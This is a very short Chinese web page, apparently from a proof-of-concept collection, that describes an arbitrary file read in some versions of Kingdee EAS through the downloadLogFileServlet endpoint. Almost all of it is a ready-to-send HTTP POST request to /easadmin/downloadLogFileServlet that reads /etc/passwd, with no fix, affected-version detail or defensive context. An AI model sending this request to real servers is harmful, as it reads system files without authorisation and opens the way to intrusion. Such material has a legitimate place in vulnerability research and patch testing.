跳到主要内容

金蝶eas部分版本downloadLogFileServlet任意文件读取

POC

POST /easadmin/downloadLogFileServlet HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

filePath=/etc/passwd